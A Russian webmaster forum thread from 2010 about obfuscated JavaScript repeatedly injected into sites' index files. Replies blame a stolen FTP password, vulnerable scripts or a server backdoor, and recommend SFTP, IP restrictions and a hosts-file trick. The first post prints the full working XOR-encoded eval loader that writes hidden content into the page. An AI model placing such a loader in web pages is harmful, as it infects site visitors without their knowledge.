С нами с 12.06.04
Сообщения: 122
|
Добавлено: 13/02/10 в 00:37 |
Второй раз уже на хостинге у всех сайтов в конце индексных файлов появляется такая дрянь:
Код: | <script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1)uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2)snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script> |
C учетом того что хостер серьезный думал что ноги этой дряни растут от моего компьютера, прошуршал все антивирусом(NOD), поменял антивирус(KIS) и прошуршал еще раз, и вновь эта беда. Хотелось бы понять, это все же моя беда, либо стоит трясти хостера?
|
|
|
|
АНГЕЛ
С нами с 01.11.01
Сообщения: 33061
Рейтинг: 10694
|
Добавлено: 13/02/10 в 00:41 |
Индекс пхп ?
Была такая хуйня. Снёс и сделал индекс хтмл ;)
|
|
|
|
Дизайн, вёрстка, то сё
С нами с 16.10.02
Сообщения: 4875
Рейтинг: 3947
|
Добавлено: 13/02/10 в 01:01 |
скорее всего "ушел" пароль на фтп
|
|
Респонсивная верстка - icq 282886909
|
0
|
|
|
С нами с 12.06.04
Сообщения: 122
|
Добавлено: 13/02/10 в 02:20 |
Sebastano Perero: без разницы, index.hml или index.php. На одном аккаунте больше 10 сайтов висит, у всех одна и та же беда случилась.
awa: похоже так и есть, поскольку сейчас проверил несколько сайтов на другом хосте - та же беда... что лучше использовать в качестве FTP-клиента?
|
|
|
|
С нами с 13.08.04
Сообщения: 222
Рейтинг: 105
|
Добавлено: 13/02/10 в 02:59 |
Скорее дело не в том какой клиент, а как ушел пароль FTP. Пароль может уходить с твоего компа и из сети. Для того, что бы пароль не передавался по сети в открытом виде нужно использовать протокол SFTP. А какой при этом будет использоваться клиент не так важно.
|
|
|
|
С нами с 20.01.03
Сообщения: 18003
Рейтинг: 9760
|
Добавлено: 13/02/10 в 04:51 |
пароли хранились в фтп-клиенте?
|
|
|
|
С нами с 18.11.99
Сообщения: 14226
|
Добавлено: 13/02/10 в 04:56 |
Переходите на SFTP с разрешенным входом только с вашего IP, и будет счастье.
|
|
|
|
С нами с 28.02.03
Сообщения: 8544
Рейтинг: 1609
|
Добавлено: 13/02/10 в 13:09 |
Если нет возможности ограничить по Ip доступ
То я делаю так
Идешь в
C:\WINDOWS\system32\drivers\etc
В файл hosts пишет
(Ip ftp сервера ) пробел любое имя
Sample
123.123.123.123 ftphost1
в итоге что мы имеем вирус п$здит учету
логин и пароль но зайти на сервер ftphost1 на другом компе не реально
многим помогло
|
|
Сдам место в подписи. Предложения в личку.
|
0
|
|
|
Bitcoin
С нами с 18.11.01
Сообщения: 4709
Рейтинг: 3066
|
Добавлено: 13/02/10 в 14:35 |
Возможно дырявые скрипты.
|
|
Tube.Cash выкупит ваш трафик на галеры, заплатит за переходы с эмбедов
|
0
|
|
|
www.2dayhost.com
С нами с 16.12.02
Сообщения: 1530
Рейтинг: 755
|
Добавлено: 13/02/10 в 14:56 |
Yahook, даже если первый взлом был не через дырявый скрипт, cейчас на хосте ТС (с большой долей вероятности) уже лежит backdoor для переодического добавление левого кода в index.php файлы
Поэтому, даже после смены пароля и всего остального что тут уже советовали, детальная инспекция всех файлов на хостинге - обязательна ;)
|
|
|
|
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
Добавлено: 14/02/10 в 13:56 |
|
|
|
|